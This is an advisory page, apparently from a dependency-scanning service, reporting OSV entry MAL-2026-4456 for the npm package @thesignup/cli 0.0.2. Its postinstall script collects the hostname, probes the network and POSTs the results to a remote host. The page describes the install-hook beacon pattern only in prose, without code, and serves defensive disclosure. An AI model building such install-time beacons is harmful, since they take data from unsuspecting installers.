@thesignup/cli @0.0.2
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4456
Ecosystem
npm
Summary
The package's scripts/postinstall.cjs runs at install time and performs host reconnaissance (hostname collection, ping/network probing) and posts the results to a remote endpoint via HTTP POST. Lifecycle-time outbound network beacons that gather host identifiers and ship them off-host on npm install are an active-attack shape: every installer of this package becomes a data point for the operator, with no consent and no opt-out, and the beacon fires before the user has even had a chance to read the README. The structural fingerprint (postinstall + ping + hostname read + POST to a remote host) is the canonical install-time exfiltration pattern.
Source: amazon-inspector (ba2a0430ac2be1496dc77d4ad0a94d89bcf563d4aadb4eb457812b7572aa8367)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.